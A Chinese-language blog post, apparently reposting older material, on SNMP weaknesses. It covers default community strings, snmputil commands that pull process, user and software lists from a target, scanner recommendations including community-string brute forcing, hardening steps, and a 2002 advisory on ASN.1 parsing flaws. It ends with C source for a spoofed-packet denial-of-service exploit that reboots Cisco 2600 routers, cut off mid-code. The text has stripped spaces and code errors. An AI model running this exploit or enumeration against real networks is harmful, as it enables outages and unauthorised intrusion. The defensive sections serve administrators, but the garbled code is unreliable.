snm簡單網(wǎng)絡(luò)管理協(xié)議漏洞

snmp簡單網(wǎng)絡(luò)管理協(xié)議漏洞分析字體:|發(fā)表于:2023-4-1001:23

作者:menyuchun

來源:IXPUB技術(shù)博客簡單網(wǎng)絡(luò)管理協(xié)議(SNMP)是一個可以遠(yuǎn)程管理計算機和網(wǎng)絡(luò)設(shè)備的協(xié)議.有兩種典型的遠(yuǎn)程監(jiān)控模式.他們可以粗略地分為"讀"和"寫"(或者是PUBLIC和PRIVATE).如果攻擊者能猜出一個PUBLIC團(tuán)體串值,那么他就可以從遠(yuǎn)程設(shè)備讀取SNMP數(shù)據(jù).這個信息可能包括系統(tǒng)時間,IP地址,接口,運行著的進(jìn)程,etc等.如果攻擊者猜出一個PRIVATE團(tuán)體串值(寫入或"完全控制",他就有更改遠(yuǎn)程機器上信息的能力.這會是一個極大的安全漏洞,能讓攻擊者成功地破壞網(wǎng)絡(luò),運行的進(jìn)程,ect.其實,"完全控制"會給遠(yuǎn)程攻擊者提供在主機上的完全管理權(quán)限.更多信息請參見:___________________________________________________________________SNMPAgentrespondedasexpectedwithcommunityname:publicCVE_ID:CAN-1999-0517,CAN-1999-0186,CAN-1999-0254,CAN-1999-0516BUGTRAQ_ID:11237,10576,177,2112,6825,7081,7212,7317,9681,986NESSUS_ID:10264Otherreferences:IAVA:2001-B-0001SNMP服務(wù)在UDP161/162端口監(jiān)聽用法:snmputilwalkIPpublic[OID][----------OID-----------------------含義-------]...2.1.2

獲取系統(tǒng)進(jìn)程...

獲取用戶列表...4.1.0

獲取域名...3.1.2

獲取安裝的軟件..2.1.1

獲取系統(tǒng)信息--------------------------------------------------------------------掃描到的一個報告：.端口"snmp(161/udp)"發(fā)現(xiàn)安全漏洞:

Snmp口令:

"public".端口"snmp(161/udp)"發(fā)現(xiàn)安全提示:

sysDescr.0=DraytekV3300AdvancedRouter

sysUpTime.0=3Days,1Hours,53Minutes,10Seconds

sysContact.0=admin@router

sysName.0=V3300c

sysLocation.0=HsinChu

sysServices.0=0目的：得到遠(yuǎn)程目標(biāo)的系統(tǒng)敏感信息簡單利用方法這里的public使用來查詢對方信息時所用到的密碼具體的做法：要用到一個叫snmputil的東西，這個東西在win2000的resourcekit中有，通過它我們可以通過snmp服務(wù)來查看對方的一些信息格式：snmputilget(orwalkorgetnext)publicoidget和括號里的時獲取對方機器信息的一種方法，public就是查尋的時候要用的密碼。oid是被查詢設(shè)備的ID號碼例如：snmputilwalkippublic(列出系統(tǒng)進(jìn)程)snmputil(列出系統(tǒng)用戶列表)(列出域名)(列出安裝軟件)snmputillwalkippublic..2.1(列出系統(tǒng)信息)------------------------------------------------------------關(guān)于掃描中snmp信息的利用對于完全安裝的WIN2K或者說啟動了簡單網(wǎng)絡(luò)管理協(xié)議（SNMP）的系統(tǒng)來說，仍然將存在非常致命的隱患，完全將你的系統(tǒng)暴露給所有人。一、從SNMP說起SNMP，SimpleNetworkManagementProtocol，簡單網(wǎng)絡(luò)管理協(xié)議。用于管理IP網(wǎng)絡(luò)上結(jié)點的協(xié)議。幾乎所有的網(wǎng)絡(luò)設(shè)備和網(wǎng)絡(luò)操作系統(tǒng)都支持SNMP。接下來要介紹的是：communitystrings，理解成為基于SNMP協(xié)議信息通信時使用的一種“查詢密碼”應(yīng)該不為過吧。當(dāng)使用特殊的客戶端應(yīng)用程序，通過該“查詢密碼”communitystrings的驗證，將獲得對應(yīng)的權(quán)限（只讀或者讀寫)對SNMP中管理信息庫（MIB）進(jìn)行訪問。而管理信息庫（MIB）中則保存了系統(tǒng)所有的重要信息。也就是說，如果可以知道communitystrings這個“查詢密碼”，我們就可以刺探系統(tǒng)的信息了。比較遺憾的是，很多網(wǎng)絡(luò)設(shè)備廠商以及操作系統(tǒng)廠商，在初始狀態(tài)下，都使用比較統(tǒng)一的“查詢密碼”呵呵，這也就給我們提供了足夠的方便。二、對WIN2K進(jìn)行刺探掃描以WIN2K來說，一旦安裝并啟動了簡單網(wǎng)絡(luò)管理協(xié)議，系統(tǒng)將打開UDP161snmpUDP162snmptrap兩個端口。具體做什么我們不去細(xì)究。需要注意的是，這里使用的是UDP端口，而不是TCP端口。同時，WIN2K系統(tǒng)支持初始的“查詢密碼”communitystrings為：public我們只要通過一款ResourceKit里面的工具snmputil，就可以方便的獲得非常多的信息。在這里可以下載：簡單介紹一下用法snmputil，就是程序名拉，呵呵。get，就理解成獲取一個信息。getnext，就理解成獲取下一個信息。walk，就理解成獲取一堆信息（嗯，應(yīng)該說所有數(shù)據(jù)庫子樹/子目錄的信息）agent，具體某臺機器拉。community，嗯就是那個“communitystrings”“查詢密碼”拉。oid，這個要多說一下，這個呢，就是物件識別代碼（ObjectIdentifier）?？梢园裲id理解成MIB管理信息庫中各種信息分類存放樹資源的一個數(shù)字標(biāo)識。嘗試獲得對方機器當(dāng)前進(jìn)程列表snmputil.exewalk對方ippublic...2.1.2嘗試獲得對方機器系統(tǒng)用戶列表snmputilwalk對方ippublic...整理一些列在下面：snmputilwalk對方列出系統(tǒng)進(jìn)程snmputilwalk對方列系統(tǒng)用戶列表snmputilget對方列出域名snmputilwalk對方列出安裝的軟件snmputilwalk對方列出系統(tǒng)信息三、一些工具的推薦snmputil的功能已經(jīng)完全足夠用來進(jìn)行對網(wǎng)絡(luò)主機的刺探掃描了，只是因為它是命令行下的工具而且，超常的oid標(biāo)識符也并不是那么方便輸入。這里我推薦兩款非常不錯的網(wǎng)絡(luò)管理工具，當(dāng)然，它們的另一個作用就是snmp的刺探。SolarWinds2001的IPNetworkBrowserIPNetworkBrowser是一款snmp瀏覽工具，它可以提供在輸入正確的communitystrings“查詢密碼”后的運行著snmp服務(wù)的WIN2K/NT系統(tǒng)上的任何可得的信息。在下圖中，我們可以看到“查詢密碼”為：public而在Accounts（賬號）表單里，我們已經(jīng)獲得了同上面snmputil命令行方式一樣的反饋信息。功能強大噢。整個SolarWinds軟件套件更包含了更多的網(wǎng)絡(luò)管理工具，以后我將在其他的文章里繼續(xù)介紹。LANguardNetworkScanner2.0這是一個網(wǎng)絡(luò)安全綜合掃描工具，主要功能：顯示每臺主機的NETBIOS主機名，MAC地址，搜尋共享，操作系統(tǒng)類型判斷，并測試共享密碼的安全性等等，以html格式輸出。當(dāng)然，LANguardNetworkScanner還有一些更高級更適用的功能比如暴力破解communitystrings，呵呵自己配置一個字典的話會非常有效的。四、如何防范基于snmp的刺探掃描首先需要注意的是，snmp服務(wù)的通訊端口是UDP端口，這也就是大部分網(wǎng)絡(luò)管理人員很容易忽略的地方。往往某些網(wǎng)管配置服務(wù)器阻斷了NetBIOS空會話的建立，就認(rèn)為系統(tǒng)安全有了相當(dāng)?shù)谋Ｕ?，可由于安裝了SNMP服務(wù)，不知不覺中，就給系統(tǒng)帶去了極大的隱患。最方便和容易的解決方法，就是關(guān)閉SNMP服務(wù)，或者卸載掉該服務(wù)。如果關(guān)掉SNMP服務(wù)不方便的話，那么可以通過修改注冊表或者直接修改圖形界面的SNMP服務(wù)屬性進(jìn)行安全配置。開始——程序——管理工具——服務(wù)——SNMPService——屬性——安全在這個配置界面中，可以修改communitystrings，也就是微軟所說的“團(tuán)體名稱”，呵呵，也就是我所說的“查詢密碼”。或者可以配置是否從某些安全主機上才允許SNMP查詢。不過NT4環(huán)境下的朋友就必須修改注冊表了。修改communitystrings，在[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities]下，將public的名稱修改成其它的名稱就可以了。如果要限定允許的ip才可以進(jìn)行SNMP查詢，可以進(jìn)入[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers]添加字符串，名稱為“1”，內(nèi)容為要允許的主機IP。當(dāng)然，如果允許多臺機器的話，就要名稱沿用“2、3、4”等名稱了。-----------------------------------------------------------------附帶資料:SNMP協(xié)議實現(xiàn)存在多個漏洞--------------------------------------------------------------------------------來源:

類別:系統(tǒng)漏洞日期:2002-6-228:08:04涉及程序：SNMP協(xié)議和各種網(wǎng)絡(luò)設(shè)備描述：snmp協(xié)議實現(xiàn)機制存在多個漏洞嚴(yán)重危害互聯(lián)網(wǎng)基礎(chǔ)安全詳細(xì)：背景：ASNNo.1信令為抽象數(shù)據(jù)類型形式的標(biāo)準(zhǔn)，1984年以來，被用于編寫和發(fā)送復(fù)雜的數(shù)據(jù)結(jié)構(gòu)。這個語言從80年代開始衍生出了多個通信協(xié)議和應(yīng)用，是電信業(yè)、電力業(yè)和核電業(yè)計算機網(wǎng)絡(luò)基礎(chǔ)信令。也是互聯(lián)網(wǎng)賴以運行的基礎(chǔ)通信規(guī)則之一。全球級計算機安全專家正在調(diào)查ASNN0.1信令的安全脆弱性。這些脆弱性嚴(yán)重威脅互聯(lián)網(wǎng)基礎(chǔ)設(shè)施安全，黑客可以開發(fā)攻擊程序，關(guān)閉ISP的骨干路由器、交換機和眾多的基礎(chǔ)網(wǎng)絡(luò)設(shè)備。最終破壞性的后果將是引起互聯(lián)網(wǎng)癱瘓。業(yè)界和政府的計算機安全專家門早就在關(guān)注這些問題。CNNS的安全專家早在1999年就發(fā)現(xiàn)很多電信公司的骨干路由器有致命缺陷。在那個時候，只需要很簡單的操作，就可以引起大規(guī)模的網(wǎng)絡(luò)癱瘓。舉一個例子，一個顯著的漏洞特征曾經(jīng)出現(xiàn)在臺灣中華電信，1999年如果有黑客施之以簡單攻擊，整個臺灣地區(qū)大約65%的用戶就不再能上網(wǎng)。由于ASNNo.1信令的安全脆弱性，超過100家計算機網(wǎng)絡(luò)設(shè)備的提供商將付出代價。彌補這些缺陷的投入將超過1億美金。數(shù)百家網(wǎng)絡(luò)設(shè)備提供商在今年早期就獲得警告。如今已經(jīng)紛紛給出解決方案。由于多個internet通信協(xié)議都是基于ASNNo.1計算機網(wǎng)絡(luò)語言，ASNNo.1的脆弱性將廣泛威脅通信行業(yè)。最為顯著的例子就是造成SNMP協(xié)議多個安全漏洞。相同的問題還影響至少其它三個互聯(lián)網(wǎng)協(xié)議，在這里不做詳細(xì)敘述。OuluUniversitySecureProgrammingGroup(OUSPG,)長期專注于SNMP協(xié)議的研究，并披露了這個嚴(yán)重的安全系列問題。=========================================================================================多個計算機網(wǎng)絡(luò)設(shè)備廠商的產(chǎn)品存在由于snmp協(xié)議脆弱性引起的多個漏洞，這些缺陷可能允許非法越權(quán)訪問、拒絕服務(wù)攻擊、導(dǎo)致不穩(wěn)定的運行狀況。SimpleNetworkManagementProtocol(SNMP)協(xié)議被廣泛用于網(wǎng)絡(luò)設(shè)備的監(jiān)控和管理。SNMPv1定義了多個類型的SNMP訊息，如請求信息、配置改變、請求響應(yīng)、SNMP對象列舉，和主動的警報發(fā)送。一、SNMPv1跟蹤消息處理系列缺陷SNMP代理(SNMPagents)發(fā)送跟蹤消息(SNMPtrapmessages)到管理器(SNMPmanager)，向管理器報告錯誤信息、警報和其它的有關(guān)宿主的狀態(tài)信息。管理器必須解析和處理這些數(shù)據(jù)。OUSPG發(fā)現(xiàn)很多SNMP管理器在解析和處理過程中存在缺陷。二、SNMPv1請求信息處理系列缺陷SNMP請求信息是從管理器向snmpagent代理發(fā)出的。請求信息用于獲取代理信息或指示snmpagent配置設(shè)備參數(shù)。SNMPagent代理必須正確解碼和處理該信息。在解碼以及隨后的數(shù)據(jù)處理過程中，代理和管理器都有出現(xiàn)拒絕服務(wù)錯誤、格式化字符串錯誤和緩沖溢出攻擊的可能。有的攻擊甚至不需要提供正確的SNMPcommunitystring(SNMP協(xié)議設(shè)置的一個關(guān)鍵參數(shù)，有點類似口令)。這些漏洞可以導(dǎo)致拒絕服務(wù)、服務(wù)中斷，還有一些情況下可以允許攻擊者獲取設(shè)備的非法訪問權(quán)限。攻擊對于不同的產(chǎn)品有不同的影響。解決方案：本站列出了一百多個全球大廠商關(guān)于這個安全問題的響應(yīng)和有關(guān)信息：請注意，以下的安全措施對于您的網(wǎng)絡(luò)日常維護(hù)和網(wǎng)絡(luò)設(shè)置構(gòu)架可能有重大的影響。要確保以下措施的結(jié)果不會影響網(wǎng)絡(luò)運行性能。1、從廠商獲得補丁程序并執(zhí)行提供了廠商有關(guān)該安全性問題的信息。2、禁止SNMP服務(wù)CNNS建議您禁止所有不必要運行的服務(wù)，包括SNMP。不幸的是，有些產(chǎn)品在SNMP服務(wù)被禁止的情況下會有意外情況發(fā)生或者拒絕服務(wù)。如果是這樣的話，必須執(zhí)行更高級的安全設(shè)置。3、邊界訪問過濾臨時的措施是，在網(wǎng)絡(luò)邊界禁止不良信息流進(jìn)入內(nèi)部網(wǎng)絡(luò)或者發(fā)往外部網(wǎng)絡(luò)。對于網(wǎng)絡(luò)管理者來說，比較有力的措施是通過防火墻等過濾設(shè)備控制對SNMP服務(wù)的請求。比如，除指定的服務(wù)器外，缺省情況下通通禁止對SNMP服務(wù)的請求，以下端口的過濾有利于外部攻擊者對內(nèi)部網(wǎng)的SNMP攻擊：snmp161/udp#SimpleNetworkManagementProtocol(SNMP)snmp162/udp#SNMPsystemmanagementmessages以下這些服務(wù)并不常用，但有些產(chǎn)品可能運行這些服務(wù)：snmp161/tcp#SimpleNetworkManagementProtocol(SNMP)snmp162/tcp#SNMPsystemmanagementmessagessmux199/tcp#SNMPUnixMultiplexersmux199/udp#SNMPUnixMultiplexersynoptics-relay391/tcp#SynOpticsSNMPRelayPortsynoptics-relay391/udp#SynOpticsSNMPRelayPortagentx705/tcp#AgentXsnmp-tcp-port1993/tcp#ciscoSNMPTCPportsnmp-tcp-port1993/udp#ciscoSNMPTCPport過濾對這些服務(wù)的請求，必須細(xì)心慎重，以免影響正常的網(wǎng)絡(luò)運行。值得注意的是，SNMP守護(hù)進(jìn)程可能在該設(shè)備上綁定所有的IP地址。因此，要合理考慮包過濾策略。比如，即使禁止了SNMP包直接發(fā)送給普通的網(wǎng)絡(luò)地址，還是有可能受到攻擊。因為攻擊者可以利用SNMP缺陷攻擊一些特殊的網(wǎng)絡(luò)地址，如：網(wǎng)絡(luò)廣播地址子網(wǎng)廣播地址和所有的loopback地址。(127.x.x.x)loopback地址常被路由器用于管理用途。管理員可以考慮是否過濾這些數(shù)據(jù)包。但必須慎重，因為不當(dāng)?shù)脑O(shè)置可能影響網(wǎng)絡(luò)性能。最后，對以下的RPC服務(wù)的訪問也可以考慮禁止：名稱程序ID別名snmp100122na.snmpsnmp-cmcsnmp-synopticssnmp-unisyssnmp-utksnmpXdmid100249值得注意的是，這些措施對內(nèi)部攻擊無效。4、在內(nèi)部網(wǎng)絡(luò)中過濾不正常的SNMP訪問。在很多網(wǎng)絡(luò)系統(tǒng)中，只有有限的網(wǎng)絡(luò)管理系統(tǒng)需要發(fā)生SNMP請求。基于這種情形，對于大多數(shù)的SNMP代理，可以設(shè)置僅接受有限幾臺主機的SNMP請求。這樣可以降低內(nèi)部攻擊風(fēng)險。使用這些安全措施同樣必須慎重，以免不當(dāng)?shù)脑O(shè)置降低網(wǎng)絡(luò)性能。5、修改缺省的"communitystring"很多支持SNMP服務(wù)的產(chǎn)品的出廠設(shè)置中，默認(rèn)的community-string是"public"(只讀訪問)和"private"(讀寫訪問)。CNNS強烈建議用戶修改這兩個缺省字符串。否則攻擊者將可以通過SNMP協(xié)議修改設(shè)備的設(shè)定。修改了這兩個缺省"口令"后，還要防備監(jiān)聽攻擊以免攻擊者獲得新的設(shè)置"口令"。SNMPv3對這點做了改進(jìn)，參考RFC2574。6、隔離SNMP包從網(wǎng)絡(luò)管理的角度，用隔離措施可以降低SNMP攻擊的風(fēng)險。包括物理隔離、VLAN邏輯隔離和VPN方式的隔離。注意通過交換機做VLAN隔離將加大攻擊者攻擊難度，但理論上并不能完全杜絕這類攻擊。------------------------------------------------------攻擊方法：范例：一、如果獲取支持SNMP協(xié)議設(shè)備的"communitystring"，在合適的環(huán)境下，攻擊者將可以：1、修改路由器配置2、獲取服務(wù)器最高控制權(quán)3、重新啟動設(shè)備二、攻擊者在不知道"communitystring"的前提下，也能進(jìn)行拒絕服務(wù)攻擊。以下這段代碼將重啟Cisco2600路由器：/*Thisprogramsendaspoofedsnmpv1getrequestthatcausesystemrebootonCisco2600routerswithIOSversion12.0(10)Author:...don'tbelameusefortestingonly!..*/#include<stdio.h>#include<string.h>#include<unistd.h>#include<stdlib.h>#include<sys/socket.h>#include<netinet/in.h>#include<netinet/ip.h>#include<netinet/udp.h>#include<arpa/inet.h>structin_addrsourceip_addr;structin_addrdestip_addr;structsockaddr_indest;structip*IP;structudphdr*UDP;intp_number=1,sok,datasize,i=0;char*packet,*source,*target;char*packetck;char*data,c;charsnmpkill[]="\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x81""\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81""\x91\x06\x81\x8c\x4d\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73""\x25\x73\x25\x73\x25\x73\x81\xff\xff\xff\xff\xff\xff\xff\xff\x7f""\x05";structpseudoudp{u_longipsource;u_longipdest;charzero;charproto;u_shortlength;}*psudp;in_cksum(unsignedshort*ptr,intnbytes){registerlongsum;/*assumeslong==32bits*/u_shortoddbyte;registeru_shortanswer;/*assumesu_short==16bits*//**Ouralgorithmissimple,usinga32-bitaccumulator(sum),*weaddsequential16-bitwordstoit,andattheend,foldback*allthecarrybitsfromthetop16bitsintothelower16bits.*/sum=0;while(nbytes>1){sum+=*ptr++;nbytes-=2;}/*mopupanoddbyte,ifnecessary*/if(nbytes==1){oddbyte=0;/*makesuretophalfiszero*/*((u_char*)&oddbyte)=*(u_char*)ptr;/*onebyteonly*/sum+=oddbyte;}/**Addbackcarryoutsfromtop16bitstolow16bits.*/sum=(sum>>16)+(sum&0xffff);/*addhigh-16tolow-16*/sum+=(sum>>16);/*addcarry*/answer=~sum;/*ones-complement,thentruncateto16bits*/return(answer);}voidusage(void){printf("KunderaCiscoKillv1.0\n";printf("Usage:ciscokill[-nnumberofpackets][-ssourceip_addr]-tip_target\n";}intmain(intargc,char**argv){if(argc<2){usage();exit(1);}while((c=getopt(argc,argv,"s:t:n:")!=EOF){switch(c){case's':source=optarg;break;case'n':p_number=atoi(optarg);break;case't':target=optarg;}}if((sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){printf("Can'tcreatesocket.\n";exit(EXIT_FAILURE);}destip_addr.s_addr=inet_addr(target);sourceip_addr.s_addr=inet_addr(source);datasize=sizeof(snmpkill);packet=(char*)malloc(20+8+datasize);IP=(structip*)packet;memset(packet,0,sizeof(packet));IP->ip_dst.s_addr=destip_addr.s_addr;IP->ip_s